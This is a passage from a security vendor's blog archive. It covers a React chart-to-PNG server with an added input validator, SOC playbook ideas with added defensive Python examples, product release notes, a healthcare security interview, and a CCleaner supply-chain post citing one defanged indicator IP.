  React.createElement(YAxis, null),
  React.createElement(CartesianGrid, { stroke: "#eee", strokeDasharray: "5 5" }),
  React.createElement(Line, { type: "monotone", dataKey: "uv", stroke: "#8884d8" }),
  React.createElement(Line, { type: "monotone", dataKey: "pv", stroke: "#82ca9d" })
);

// Add routes
app.post('/convert-chart-to-png', (req, res) => {
  repng(chart, {
    width: req.body.width,
    height: req.body.height,
    props: req.body
  })
  .then(streams => {
    // repng resolves with one PNG stream per render; we only asked for one
    const [ pngData ] = streams;
    const chunks = [];
    pngData.on('data', chunk => chunks.push(chunk));
    pngData.on('end', () => res.send(Buffer.concat(chunks).toString('base64')));
    pngData.on('error', err => res.status(500).send(err.message));
  })
  .catch(err => res.status(500).send(err.message));
});

// Start the server
app.listen(port, () => console.log(`Running on port ${port}`));

In your terminal of choice, cd your way to the project folder and run node index.js (or whatever you named your file) and your server should echo “Running on port 8080”.

Now you can POST some chart data to localhost:8080/convert-chart-to-png and get base64 image data in the response!

Obviously this code is not production-ready, but hopefully it can inspire you to do something cool with React and repng - it doesn’t even have to be a chart. You could just as easily pass any React component, so why limit yourself?
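One of the things that separates the snippet above from production-ready is that the route hands req.body straight to a headless-browser render: unbounded width/height or a huge data array lets any client burn the service’s CPU and memory, and unexpected keys ride along as component props. The validator below is an added example, not Perch’s code; it whitelists exactly the fields the chart definition uses (width, height, data[].name/uv/pv/amt), and the size caps are assumptions chosen for illustration.

```javascript
// Added example (not from the original post): validate the JSON body POSTed to
// /convert-chart-to-png before anything reaches repng. Field names follow the
// LineChart definition above; the caps below are assumed values, tune to taste.

const MAX_DIMENSION = 2000; // assumed cap on rendered width/height in pixels
const MAX_POINTS = 500;     // assumed cap on number of data points per chart
const MAX_NAME_LENGTH = 64; // assumed cap on the x-axis label length
const NUMERIC_KEYS = ['uv', 'pv', 'amt'];

function isPlainObject(value) {
  return value !== null && typeof value === 'object' && !Array.isArray(value);
}

function isBoundedPositiveInt(value, max) {
  return Number.isInteger(value) && value > 0 && value <= max;
}

// Returns { ok: true, props } with a freshly built, whitelisted copy of the
// input, or { ok: false, error } naming the first problem found. Nothing from
// the request object is forwarded as-is, so extra keys never become props.
function validateChartRequest(body) {
  if (!isPlainObject(body)) {
    return { ok: false, error: 'body must be a JSON object' };
  }
  if (!isBoundedPositiveInt(body.width, MAX_DIMENSION) ||
      !isBoundedPositiveInt(body.height, MAX_DIMENSION)) {
    return { ok: false, error: `width and height must be integers in 1..${MAX_DIMENSION}` };
  }
  if (!Array.isArray(body.data) || body.data.length === 0 || body.data.length > MAX_POINTS) {
    return { ok: false, error: `data must be an array of 1..${MAX_POINTS} points` };
  }

  const data = [];
  for (let i = 0; i < body.data.length; i++) {
    const point = body.data[i];
    if (!isPlainObject(point)) {
      return { ok: false, error: `data[${i}] must be an object` };
    }
    if (typeof point.name !== 'string' || point.name.length === 0 ||
        point.name.length > MAX_NAME_LENGTH) {
      return { ok: false, error: `data[${i}].name must be a string of 1..${MAX_NAME_LENGTH} chars` };
    }
    const clean = { name: point.name };
    for (const key of NUMERIC_KEYS) {
      // typeof guards against strings like "NaN"; isFinite rejects NaN/Infinity
      if (typeof point[key] !== 'number' || !Number.isFinite(point[key])) {
        return { ok: false, error: `data[${i}].${key} must be a finite number` };
      }
      clean[key] = point[key];
    }
    data.push(clean);
  }

  return { ok: true, props: { width: body.width, height: body.height, data } };
}

// Where it slots into the Express route from the post (illustrative only):
//
//   app.post('/convert-chart-to-png', (req, res) => {
//     const result = validateChartRequest(req.body);
//     if (!result.ok) return res.status(400).json({ error: result.error });
//     repng(chart, { width: result.props.width, height: result.props.height,
//                    props: result.props }).then(/* ...as above... */);
//   });
```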

Wrapping up

We hope to use this technique to bring more of what our customers love about the Perch web app directly to their inbox.

You know what they say: an image is worth a thousand words, but a chart is worth a billion data points - or something like that.

Supercharge your SOC: 3 security playbook ideas with the Perch API

on January 21, 2018

Security automation is all the rage these days, and for good reason. Repetitive, time-consuming tasks are not only a resource drain, but they can cause rather significant security gaps as well. These manual and repetitive tasks are prone to analyst error and carelessness but are also monotonous drudgery that can leave quality talent looking for more interesting jobs.

For most CISOs, turning to security automation and orchestration through the use of playbooks is becoming a step in the right direction. Automation is a powerful strategy to not only eliminate repetitive tasks, but can uncover threats and other issues that no human would have the time to discover manually.

In conversations with our customers, we’re seeing some innovative ideas being discussed. We’re really excited to see our customers integrating the new Perch API into their automation and orchestration playbooks, thanks to the depth of community intel we have available. In this article, I wanted to highlight a few ideas to spark your imagination.

Backtesting IoCs for Deeper Threat Correlation

Security shouldn’t operate in silos any longer. Unfortunately for many organizations, making decisions about threats based upon what others in their threat community are seeing is difficult if not impossible.

However, with the power of Perch’s community data, the opportunities for integrating Perch into a security playbook are boundless. Let me illustrate with a single example. Imagine your organization receives an email from an unknown sender. You could build out a playbook that integrates Perch (among other tools!) into a set of actions.

Using the Perch API, a simple query could be made to determine the reputation of the sending IP in the email header. Data can quickly be extracted into metrics such as:

  • Has this IP been reported by other security sharing communities before?
  • How recently has this IP been reported as potentially malicious?
  • Who else has seen this IP? Does it appear to be targeting a specific industry?
  • How many different indicators have been published that contain this IP?

Hopefully by now I have you salivating at the mouth at the potential opportunities afforded by leveraging the Perch API into your playbooks. The results of this deep community data can be used to build out risk scores, response thresholds, and automated actions such as rule blocks and spam tags.
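As an added example (not Perch’s code, and not the Perch API’s real request or response format), here is the unknown-sender playbook sketched above in Python: pull the external sending IP out of the Received chain, fold the four community-intel questions into a risk score, and pick an action from thresholds. The reputation record layout, the internal network ranges, the weights and the thresholds are all assumptions, and the `lookup` callable stands in for the API query.

```python
import ipaddress
import re
from datetime import datetime, timedelta, timezone
from email import message_from_string

# Assumption: your organisation's own address space; hops inside it are skipped.
INTERNAL_NETS = [ipaddress.ip_network(n)
                 for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
BRACKET_IP_RE = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")


def is_internal(ip):
    return ip.is_loopback or any(ip in net for net in INTERNAL_NETS)


def sending_ip(raw_email):
    """Return the external IP that handed the message to our edge MTA.

    Each hop prepends its own Received header, so the top-most ones were written
    by our servers and are the only ones we can trust; lower ones may be forged.
    Walk top-down and stop at the first address outside our own networks.
    """
    msg = message_from_string(raw_email)
    for received in msg.get_all("Received", []):
        for candidate in BRACKET_IP_RE.findall(received):
            try:
                ip = ipaddress.ip_address(candidate)
            except ValueError:
                continue
            if not is_internal(ip):
                return str(ip)
    return None


def risk_score(rep, our_industry, now):
    """Fold the four questions from the article into a 0-100 score.

    `rep` (None if nothing is known) has: communities (list), last_reported
    (datetime or None), industries (list), indicator_count (int).
    """
    if rep is None or rep["indicator_count"] == 0:
        return 0
    score = min(rep["indicator_count"], 10) * 3        # how many indicators (max 30)
    score += min(len(rep["communities"]), 5) * 6       # how many communities (max 30)
    if rep["last_reported"] is not None:               # how recent (max 30)
        age = now - rep["last_reported"]
        if age <= timedelta(days=7):
            score += 30
        elif age <= timedelta(days=30):
            score += 15
        else:
            score += 5
    if our_industry in rep["industries"]:              # aimed at our industry (10)
        score += 10
    return min(score, 100)


def decide(score, block_at=70, tag_at=40):
    """Map the score onto the automated actions the article mentions."""
    if score >= block_at:
        return "block"
    if score >= tag_at:
        return "tag_spam"
    return "allow"


def triage(raw_email, lookup, our_industry, now):
    """Run the playbook end to end; `lookup(ip)` stands in for the intel query."""
    ip = sending_ip(raw_email)
    score = risk_score(lookup(ip), our_industry, now) if ip else 0
    return {"ip": ip, "score": score, "action": decide(score)}


# Constructed sample message; 203.0.113.45 is a documentation address, not a real sender.
SAMPLE_EMAIL = (
    "Received: from mx.example.org (mx.example.org [10.1.1.5])\n"
    "\tby mailbox.example.org; Mon, 22 Jan 2018 09:15:03 +0000\n"
    "Received: from mail.example.net (mail.example.net [203.0.113.45])\n"
    "\tby mx.example.org with ESMTP; Mon, 22 Jan 2018 09:15:02 +0000\n"
    "From: billing@example.net\n"
    "To: analyst@example.org\n"
    "Subject: Invoice attached\n"
    "\n"
    "Please see the attached invoice.\n"
)
NOW = datetime(2018, 1, 22, 10, 0, tzinfo=timezone.utc)

# Constructed stand-in for the reputation query; the real API response shape is
# not shown on the page, so this dict is the example's own layout.
CONSTRUCTED_REPUTATION = {
    "203.0.113.45": {
        "communities": ["community-a", "community-b"],
        "last_reported": NOW - timedelta(days=3),
        "industries": ["finance", "healthcare"],
        "indicator_count": 4,
    }
}

if __name__ == "__main__":
    print(triage(SAMPLE_EMAIL, CONSTRUCTED_REPUTATION.get, "finance", NOW))
```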

Automate the SOC Workflow

Any CISO worth their salt will tell you they prefer to leverage best of breed security tools as part of an overall security posture. Typically, however, this advantage comes with an agonizing tradeoff. Multiple tools must be individually managed and correlation and integration of data and alerts between tools is a complex challenge.

Perch was created by former security practitioners. We know firsthand that these are challenges Perch should help solve, not make worse. The Perch API can easily integrate into incident response (IR) systems to enrich their data and fill in gaps with Perch’s threat intelligence. It helps IR be orchestrated from a single unified platform, reducing analyst workload and correlation time.

Indicator Sharing: From Consumer to Producer

At any ISAC or ISAO conference, you’ll hear pleas for organizations of all sizes to begin the process of going from simply consuming threat intel to producing it. We are all in this fight together. When one organization shares intel about a threat they are seeing, countless other organizations may benefit from that intel as well.

While the philosophy is easy to explain, we’ve noticed that the most significant challenge to being a producer of threat intel is committing the time required. This is an element that can easily be automated with the Perch API.

Imagine an end user at your organization visits a compromised website that redirects web traffic to a known malicious host. Because the website was only recently compromised, there is no threat intel about the website itself, only about the malicious host it redirects to. A security playbook could easily be written that uses the Perch API to publish a new indicator to your trusted threat sharing community (ISAC or ISAO) at nearly the same time the attack was detected or blocked. Being able to shut down an attack higher up the kill chain is an effective way to shift pain back onto the bad guy by disrupting his attack infrastructure, and it gives others an early warning against the threat.
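An added example (not Perch’s code, and its record layout is not the Perch API schema) of the producer side described above: scan a constructed proxy log for 3xx redirects that land on a host already in intel, and turn the redirecting site, which has no intel yet, into a publishable indicator. The log format, the `.invalid` hostnames and the sighting threshold are assumptions.

```python
import csv
import io
from urllib.parse import urlsplit

# Constructed proxy log excerpt (CSV). Hosts and addresses are placeholders, not real IoCs.
CONSTRUCTED_PROXY_LOG = """\
time,client,method,url,status,location
2018-01-22T09:15:02Z,192.168.4.17,GET,http://recipes.example.org/blog/post-12,302,http://ns1.malicious.invalid/g.php?id=7
2018-01-22T09:15:03Z,192.168.4.17,GET,http://ns1.malicious.invalid/g.php?id=7,200,
2018-01-22T09:16:10Z,192.168.4.21,GET,http://news.example.com/,200,
2018-01-22T09:17:00Z,192.168.4.21,GET,http://recipes.example.org/blog/post-12,302,http://ns1.malicious.invalid/g.php?id=7
2018-01-22T09:18:00Z,192.168.4.30,GET,http://intranet.example.org/login,302,http://intranet.example.org/sso
"""

# Hosts already covered by intel shared with us (constructed placeholder).
KNOWN_MALICIOUS_HOSTS = {"ns1.malicious.invalid"}


def host_of(url):
    return (urlsplit(url).hostname or "").lower()


def find_redirectors(log_text, known_bad):
    """Find sites that 3xx-redirect our users to a host already in intel.

    Returns {redirecting_host: sighting summary}. The redirecting host is the
    one with no intel yet; the redirect target is what we already know about.
    """
    found = {}
    for row in csv.DictReader(io.StringIO(log_text)):
        if not row["status"].startswith("3") or not row["location"]:
            continue
        src, dst = host_of(row["url"]), host_of(row["location"])
        if dst not in known_bad or src in known_bad:
            continue
        s = found.setdefault(src, {"first_seen": row["time"], "last_seen": row["time"],
                                   "sightings": 0, "victims": set(),
                                   "targets": set(), "urls": set()})
        s["last_seen"] = max(s["last_seen"], row["time"])   # ISO timestamps sort lexically
        s["sightings"] += 1
        s["victims"].add(row["client"])
        s["targets"].add(dst)
        s["urls"].add(row["url"])
    return found


def build_indicator(src, sighting, min_sightings=2):
    """Shape a sighting into a publishable indicator, or None if it is too thin to share.

    The record layout is this example's own, not the Perch API schema. Internal
    client addresses are deliberately kept out of what gets shared.
    """
    if sighting["sightings"] < min_sightings:
        return None
    return {
        "type": "domain",
        "value": src,
        "confidence": "high" if len(sighting["victims"]) > 1 else "medium",
        "first_seen": sighting["first_seen"],
        "last_seen": sighting["last_seen"],
        "observables": sorted(sighting["urls"]),
        "description": ("Compromised site redirecting visitors to known malicious host(s): "
                        + ", ".join(sorted(sighting["targets"]))),
    }


def produce_indicators(log_text, known_bad, min_sightings=2):
    """Everything the playbook would hand to the publish step, ready to send."""
    out = []
    for src, sighting in find_redirectors(log_text, known_bad).items():
        ind = build_indicator(src, sighting, min_sightings)
        if ind:
            out.append(ind)
    return out


if __name__ == "__main__":
    for ind in produce_indicators(CONSTRUCTED_PROXY_LOG, KNOWN_MALICIOUS_HOSTS):
        print(ind["value"], ind["confidence"], ind["description"])
```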


These three ideas are just a few of the many new and innovative ideas we’re discussing with our customers. To be sure, many more ideas will continue to flow out of these playbooks. What about you? What ideas do you have about leveraging Perch among your other tools and playbooks for security automation and orchestration? I want to hear from you!

Release Notes

January 12, 2018

App-based Two-Factor Authentication: We’ve added mobile app-based (TOTP) TFA to Perch. Additionally, we’ve improved the experience for changing your credentials and moved it all to a new Account Security page. App-based TFA is really, really easy to set up and adds an additional, strong layer of security to your account.
We want to keep the suppression lists focused on the suppressions specific to your group, so we’ve removed global and community suppressions from the dashboard Recent Suppressions panel and have made their display optional (and off by default) on the Alert Suppression management page.
Added ‘workstation’ HTTP/TLS traffic tracking to sensor health. We periodically check recent traffic for domains commonly frequented by workstation users (things like Facebook, LinkedIn, news sites, etc). If we’re not seeing this kind of traffic regularly, it’s an additional sign that your sensor may not be configured to capture all of your traffic or there may be other networking issues preventing you from getting full value from your Perch sensor.
Fixed a missing ’s’ in the firewall dynamic list notes on the Firewall management page
Community dashboard main ‘suppression’ graph data is more accurate. We’ve reworked how that data is shaped and fixed this graph to show the actual, discrete counts.
COMING SOON – MOGA: our internal code name for Search 2.0, this takes any search term and sifts through everything Perch knows for matches. We’ll find indicators, observables, sensor traffic, etc. Each type of data has its own set of metrics and graphs, showing important metrics as they relate to your search term.
IN PROGRESS: additional intel platform integrations.

Release Notes

December 29, 2017

User-created indicator summary emails - you put a lot of work into getting your intel into Perch and we want you to see it getting used! These emails, sent once a week, show any activity that your intel has had.
We’ve released our first open-source code: a command-line interface tool that allows you to bulk-upload indicators from a CSV file. Now you can create intel from home, just like the pros. View it here
File observables should show all hashes instead of just the MD5 hash
Indicator detail ‘details’ should load more quickly
New comments no longer always show the ‘There was an error posting your comment’ notification
  • Comments were posted, but the client was encountering an error merging the new comment into the list for display. No comments were lost.
Minor fixes and tweaks to the public API
Coming soon: improvements to account security
  • Change password and two-factor authentication moving to a dedicated page for easier access
  • Require current password when making any account security changes
  • Support for app-based (e.g. Authy, Google Authenticator) two-factor authentication
  • Increased complexity requirements for new passwords; in addition to our current requirements, passwords will be checked against common password lists, sequences of sequential or repeated characters, and common words.

Visa and Perch Security Partner to bring Visa Threat Intelligence to SMB merchants

on December 12, 2017

Perch has teamed up with Visa in a technology partnership with Perch Security’s Community Defense Platform to expand the reach of Visa Threat Intelligence (VTI) to a broad base of merchants.

Check out the full article here.

Release Notes

December 1, 2017

Group owners & admins: if you leave a community, all open alerts for that community will now be removed. A warning message to this effect has been added to the ‘Leave Community’ confirmation check.
Added scope and reason detail to suppressions display
Dashboard alert panel was trying to load 100 alerts, but only needs to show three - it should load much faster now.
Indicator history tabs - cleaned up display a bit and added missing loading spinners
We’re close to releasing the changes to the public API for Perch alerts and bulk intel creation. We want it to be well documented and usable on release, we’re hoping you’ll think it was worth the wait!
Our work on an internal CSV intel format and loading tool is finished and we’re working with a couple of customers to iterate on it before we release to everyone.

Release Notes

November 20, 2017

Alert History - alerts come in, get triaged, and closed - then you never see them again… until now! We’ve added a new tab on the Alert Review page where you can review all of your closed alerts. You’ll see additional information about the suppression that closed the alert and can jump to the indicator detail page.
Public API improvements: create bulk intel, list alerts, documentation, Python client library. We want people using and sharing our data, we’re listening closely to our users’ requests and are working on providing a simple, clear way to interact with Perch via API.
Minor improvement to Search so that it includes indicators that contain observables that contain the search term, instead of just searching the body of the indicator.
Application tour should now skip admin-only steps for non-admin users.
Clicking the comment delete button should now actually delete the comment.
Indicator history event ordering makes more sense now - we have to load the indicator before we can detect on it.
Alerts by Host - columns scroll independently so that picking a host far down the list doesn’t require you to scroll all the way back to the top to see the alerts for that host.
We’re working on a CSV format and Python tool to bulk load intel into Perch

Release Notes

November 10, 2017

Login History now shows country flag with tooltip next to the IP address - Hey, wait a minute, when did Sally move to China?!?
Added company name to sensor health page - it’s not always easy to remember that ‘angry_carrot’ belongs to Acme Bank & Trust.
(Very Soon) Indicator detail history - shows a timeline of an indicator’s history, when the intel was produced, when it was first sighted in Perch, and when your group has alerted on and suppressed the indicator. Like a social media timeline, but with less propaganda and more threat intel.
Suppressions that would close multiple alerts now remove all of the affected alerts from the UI, instead of just the alert that the suppression was created from (affects Community/Global suppressions)
Improved (but not completely fixed) the indicator detail page ‘produced’ and ‘first/last sightings’ timestamps showing no values.
‘Content’ type observables now display a CSV list of content values instead of an empty value
Community Dashboard latest indicators was not showing the last page of the available indicators
Status update emails now show the name of the user that made the status change instead of always showing it was from Perch SOC.
Indicator detail tabs re-ordered - supplies were running low
We’re making adjustments to remove many of the scrolling panels on some of the pages. This should result in a more natural scrolling experience and improved scrolling navigation throughout the app.

Release Notes

October 20, 2017

Group users can change status on events, just like SOC - you can now change the status on an event by using a selector where the status appears
  • Remember: when you’re on the alert review page, alerts are grouped per-tab by status. Changing the status on an alert there will automatically move it to the appropriate tab; it’s not gone, just moved to a different tab.
Email notifications when someone first sights indicators you create!
  • Only sent the first time the intel is sighted.
  • If you’d prefer not to receive these notifications, you can turn them off in your user profile settings.
  • Periodic email reports about intel you’ve created are coming soon.
Indicator detail design pass
  • New graphs
  • Faster loading
  • More coming soon!
Removed SOC logins from team login history - they log in a LOT and it clutters up the view for actual group members
Assorted minor tweaks and fixes
Community Dashboard recent indicators load much faster
Improvements to rule creation monitoring and diagnostics

Release Notes

October 6, 2017

Palo Alto Firewall AddOn - Found a bad actor with Perch? Want to also block it on your firewall? Just check a box while you’re remediating and Perch will send it to the firewall for you.
  • Manage (including manually adding) firewall blocking through Perch admin panels
New - Having trouble getting around Perch town? We’ve launched a new site to bring together all the best tips and tricks for getting the most out of Perch. Have a topic not covered on the site that you’d love to know more about? Let us know.
(Very soon) User login history - Group admins have a menu item to see the login history for the team’s members; users have a new tab on their profile page to see their own login history.
Subnet tags are now displayed on public IPs
Community Dashboard - community files panel now updates correctly when you switch communities; this was purely a visual bug, no files were shared between communities.
Community Dashboard - top analysts panel no longer shows analysts with zero points; if there are no analysts with points, you’ll see a friendly, informative message.
General visual cleanup: aligned some buttons here, tweaked a message there.
Snooze suppressions have been removed. We want to keep Perch simple and easy to use; Snooze suppressions weren’t pulling their weight in the relationship and we decided they needed to go. It’s not you Snooze suppressions, it’s us. We’re sure you’ll find somebody nice.
Port numbers removed from alert Perchybana links: we found that just using the targets and time window gave the best visibility into the traffic relevant to investigating the alert.
Infrastructure upgraded to Python 3.6; other third-party libraries updated to latest and greatest. Keeping Perchy healthy and well preened lets him focus on watching your networks with confidence.

Customer Insights: John Nelson reacts to the HITRUST and American Medical Association Cyber Risk Announcement

on October 6, 2017

In late September, HITRUST and the American Medical Association announced a partnership to provide education on cyber risk management to healthcare organizations across the US. Their efforts focus on information security risk management, HIPAA compliance and cyber security, with recommendations specifically tailored for small practices, which often lack the resources and personnel that larger organizations have.

Today I spoke with John Nelson, Systems Administrator / Security Officer for U.S. Expediters, Inc. to discuss the ramifications and opportunities of this partnership.
John is the Security Officer for U.S. Expediters, Inc. He is responsible for policy development and operations related to information security and compliance. Following a career in Fire and Emergency Medical Services, he has been involved with information technology in the healthcare sector since 2000.

John, tell us your thoughts on the AMA and HITRUST partnership for security education around cyber risk management.

I am encouraged to see the AMA stepping up and seeking partners to help educate their members about the challenges they face in effectively dealing with a rapidly changing threat landscape. This initiative seems to fit well within the AMA’s stated mission: “Our mission is to promote the art and science of medicine and the betterment of public health.” The last few decades have seen digital technology bring radical changes in everything from practice management to the very tools used to diagnose and treat patients. Along with that change, of course, comes new risk. It is well that the AMA is expanding its advocate role to include education about those risks and how to mitigate them.

What do you think this means for small and mid-size healthcare organizations in the US?

Honestly, my fear is that the serious gaps I often see in the security posture of smaller organizations (which include, by the way, most hospitals and medical practices) will remain largely unmitigated. So often, many excellent solutions, designed and marketed to larger enterprises, are unapproachable for most smaller organizations. They’re either too complex, or too expensive, or both. My hope is that, with educational pushes like this, the great numbers of these smaller organizations will recognize this gap and create demand for effective and more affordable solutions.

As we all know, smaller healthcare organizations have their hands full with so many priorities. Cybersecurity is just one challenge among many. In your experience, what should security leaders in small and mid-size healthcare organizations be thinking about to enhance their cybersecurity posture?

In a word - vigilance. I wish I had a dollar for every time I’ve heard it asserted that, “Our anti-virus software is up to date, so we’re good.” For years, passive defenses like that were usually enough, but the modern threat landscape demands a more proactive approach. We must continually assess that landscape and our security posture within it. We should be actively identifying and mitigating vulnerabilities within our environments. We should be actively looking for signs of compromise in our environments. The “2017 Cost of Data Breach” report from The Ponemon Institute puts the “mean time to identify” a breach at 191 days. That’s down significantly from 229 days in the 2016 report, but it still dramatically underscores the need for more, and better… vigilance.

Thanks for your time, John! We really appreciate you talking to us today.

About U.S. Expediters: U.S. Expediters, Inc. is based in the Houston, TX area. It is a group of companies, each of which is involved in the treatment of sleep apnea. Among those entities is, the world’s largest Internet retailer of CPAP equipment.

About Perch Security: Perch Security offers the first Community Defense Platform. For the first time, even small and midsize businesses can use their sharing community membership (ISACs and ISAOs) to access their relevant industry-specific threat intelligence and participate within the community – all without purchasing specific tools or increasing staff.

Release Notes

September 29, 2017

Added intel produced or loaded time (depending on which is available) to the alert display
SOC/MSSP CRM: keep track of group contact info inside Perch, available to staff/MSSPs on the suppression modals, so that it’s handy if you need to escalate to the customer
(Very Soon) Palo Alto firewall integration - click a button in Perch to have an IP, url, or domain automatically sent to your firewall.
Better default sorting on admin pages - you mean sorting by database ID isn’t useful to users?!?
Added missing port columns to Perchybana links
Fixed dashboard most recent suppressions not always updating when they should
Fixed page styling to get rid of extra, but pointless scrollbars
Group settings should all be editable now
Sensor health detection count graph Y-Axis labels now show ‘file size’ (x.xGB) numbers, instead of raw byte counts
Indicators now show more observables, up to 1000 (up from 200).
API users no longer appear in the group’s user management list (you can still find your API user info on the group settings pages)
Fixed the group setup page in the signup flow showing the “This field is required” error as soon as the page shows, instead of only when the data needed to be validated
Fixed large, fixed size alert panel on the indicator detail page
Added a check and a useful error message when the user’s browser doesn’t support WebGL

Performance pass, improved caching of frequently used data

Sensor health diagnostic commands and raw health removed for non-staff. No one enjoys seeing how the sausage is made!

Improved tracking and logging for failed logins; tweaks to how failed logins are communicated to staff

Alert row visual tweaking: less vertical space between data, more vertical space between rows.

Improved automatic staff notification when new users and groups join

CCleaner: how to use Perch to confirm you weren't compromised

on September 21, 2017

Cisco’s Talos research team published a blog post Monday covering another supply chain attack involving CCleaner, the well-known and popular system maintenance software.

According to Cisco: For a period of time, the legitimate signed version of CCleaner 5.33 being distributed by Avast also contained a multi-stage malware payload that rode on top of the installation of CCleaner.

Attacks like this against the trusted supply chain between a software manufacturer and its customers are a growing attack vector because of their potential effectiveness and impact. Security controls like firewalls and endpoint protection are often unable to detect supply chain attacks initially, because the trust relationships are already in place.

In the wake of a supply chain attack, you benefit from reviewing your network traffic for any indicators of compromise (IOCs); access to network traffic history (like Perchybana) lets you analyze and respond immediately.

Perch customers can quickly search for any indications of compromise using Perchybana, Perch’s new network data search and correlation tool. In Cisco’s report, the following observable was published:

  • 216.126.225[.]148

Additionally, Perch analysts were able to add additional observables from Cisco’s report:


To review for any network traffic with these observables, Perch users can quickly use these search terms within Perchybana to determine if further incident research and response is warranted:

Perchybana Screenshot

As always, Perch’s Security Operations Center team is monitoring for these IOCs and proactively reached out to any customers who may be impacted.

Release Notes

August 11, 2017

Perchybana per-user saved searches - Decorating her nest with all manner of brightly colored bits of user configuration, now each of our users can have their very own Perchybana configuration - including their own saved searches.
Group selection on suppression review
  • Suppressions load slowly, we know; this is the first step in fixing that
  • More coming soon.
In this month’s edition of Sensor Health magazine:
  • New health details
  • Graph scales that make sense
  • CPU info display
  • And the displayed detection drop percentage precision increased by 100% (Re: now we show two decimal places instead of one.)
New end of signup flair - not so exciting for existing customers, but now every new sign up gets a free puppy! Ok, no free puppy, but there are some digital fireworks. And a sad Perchy if things go wrong.
Enhanced sensor health evaluation
  • No one is happy when sensors aren’t able to do their thing. We’re making our sensor reporting more robust and being more aggressive about what conditions we monitor. Our periodic sensor health reports contain more details and warn about more conditions.
Indicators you’ve created now link to the object detail page so that you can see all of the details about your creation. You’re proud of what you’ve created, you want to see it out there among all the other wild indicators doing its thing. We want those special moments with your indicator to be easier, so now you can jump right to the details page for indicators you’ve created, by clicking on their title from the Sharing ➔ Your Indicators page.
Improved load performance of object detail page, separated sections to load independently - same bat time, same bat channel, same bat data; just served up differently so that the page loads a little better/faster.
Community tags for the communities you’ve shared an indicator with can be clicked to take you to that community’s dash. Community tags should all work the same, but we keep finding the old ones hiding in corners. If you find one that you click on, but it doesn’t take you to the community dashboard, report it!
Global/Community suppressions no longer appear under the ‘Unknown [null]’ group - As part of our No Suppression Left Behind campaign, we’ve ensured that every suppression gets a proper section title, regardless of socioeconomic background, race, creed, or actual group membership. #EqualityForAllSuppressions
Improved internal tools to ensure our customers are having a positive Perchy experience. We’re looking for patterns that warn us that someone’s having a not-so-great experience with Perch, so that we can proactively reach out, figure out what’s not right, and get it fixed ASAP.

Release Notes

July 28, 2017

Dashboard: Now you can see both the active alerts and the things that have been suppressed since you were gone.
Support for international postal codes in sensor setup - Perch learns to be a more equal opportunity guardian of the galaxy; no matter where your sensor is (as long as it’s not the middle of the desert), Perch can put you on the cyber-security map.
Perchybana is live! Impress friends and neighbors with your network traffic insights. Be the life of any party by tracing netflow and diagnosing malware infections.
Alert review pagination, improved alert performance throughout Perch - people like books, books have pages, therefore people like pages. Now Perch has pages on its alert panels, therefore people will like Perch’s alert panels.
Sensor config - edge cases: more resiliency and error correction in uncommon install use cases, more ‘self-healing’ functionality to adjust for common problems.
Alert ‘all targets’ now pulls from the right data source - it used to come from column A, now it comes from column B. Same data, but easier/faster to query.
Show error message if user tries to create a subnet with a name that is too long - focus groups seem to indicate that users do not enjoy functionality that silently fails, so we’ve added a meaningful error message. Who would have known?
Backtest now returns group matches.
We love feedback from our users! If you see something that’s not right, or have an idea to make Perch even more awesomer, report it to

Fishtech Group Announces Strategic Investment and Partnership with Perch Security

on July 19, 2017

Fishtech Group today announced a strategic investment in Perch Security, the information security maverick that combines innovative application design with an in-house security operations center (SOC). This new partnership seeks to expand Perch’s sales and marketing efforts, and to broaden and accelerate product development.


Release Notes

July 14, 2017

New button next to alert IP addresses to copy to clipboard (without port number)
Improved sensor health network host count
  • Shows last 48 hours only (instead of all time)
  • Updates in real-time (instead of once daily)
Cisco Talos community created – get an oink code here: (third party, not affiliated with Perch)
Suppress by IP: you can now apply a suppression to a single host. Global, community, team, host; so many yummy suppression flavors to choose from.
Replaced Community Dashboard - Trending Indicators data with a top 5 list of indicators in a community with the highest unsuppressed alert counts, over the last 30 days.
General stability improvements to our sensors and improvements to health reporting; keeping Perchy’s eyes and ears clean and in top shape so we can See Farther.
Community feed list ‘Select All’: we think that having to click 100+ checkboxes is lame, too.
Due to the sheer number of individual sightings associated with some alerts, our ‘alert by host’ functionality on the alert review page had to be disabled temporarily so that we could re-architect some of the data that it used.
Fixed: signup process would allow a new user to skip creating a group, which causes all kinds of paperwork issues for sweet, old Fran in the back office. Per Fran’s rules, all new users must now either create a new group or join an existing one before they’re allowed inside Perchy’s exquisite garden.
Secret communities were re-classified SO secret that even Perchy had no idea which was which and started assigning groups to the wrong secret communities. We’ve given Our Great Leader access to the secret community codes and peace is restored to the galaxy, for now.
Fixed: Existing users that received an email invite to another group should now be able to use the invite link to join the group.
Fixed: Buttons that would allow multiple submissions of an action if the button was clicked rapidly (e.g. double-click). Dr. Perchy, PhB(ird), recommends that users limit coffee intake.
Fixes and tweaks to our sensor network and monitoring configurations
Perchy-bana POC is complete, was successful, and we’re building out the QA infrastructure for its initial internal release and testing.
Perch core relational database infrastructure went through another major upgrade with the addition of a read-replica, multi-db configuration, multi-port fuel injector, and twin-turbo blower. VTEC just kicked in, yo!
Hired custodial cron jobs to vacuum and clean up the database nightly. Tried to get the office custodial staff to do it, but they mumbled something about union regulations and overtime.
Nuked certain parts of our BigData infrastructure from orbit and replaced it with something better. Things work like they did before, but they cost less, run smoother, and allow us to scale better in the future.

Release Notes

June 30, 2017

Sensor health enhancements and improved monitoring so Perchy’s caretakers can respond quicker to sensors that are having issues.
  • Detection graph to see traffic level trends
  • Warning/down state for unchanging detection counts
  • Private IPs counts: how many unique IPs in each of the private IP blocks has a sensor seen (You have 1000 hosts on your network, but Perch is only seeing 10 of them)
Perchy gets better at communicating with users: action notification review and cleanup
  • More notifications, for both success and errors
  • Standard success/error look
New suppression scopes:
  • Global: SOC can suppress for all users at once
  • Community: SOC and community admins can suppress an indicator for an entire community
  • (coming soon, work complete, in-review and testing) by-IP: suppress for a single IP
Corrected the Community Dashboard Daily Events indicator counts so that they’re:
  • Storing the indicator counts
  • Computing the count correctly
Sorting by CIDR/subnet now sorts more naturally
Improved handling for observables that are missing intel data
Long comments have had a good talking to and have agreed to stay inside their comment panel better
Corrected several minor bugs and tweaks caused by database migrations & updates
The ‘all-natural’ performance enhancing supplements we’ve been feeding Perchy are paying off: his brain is bigger and better than ever!
  • Lots of expensive tech words = faster databases = more responsive Perch = happier users
  • Infrastructure work to ensure that as Perchy’s flock grows (and it is growing!), he can still respond to all of the data as fast as possible!
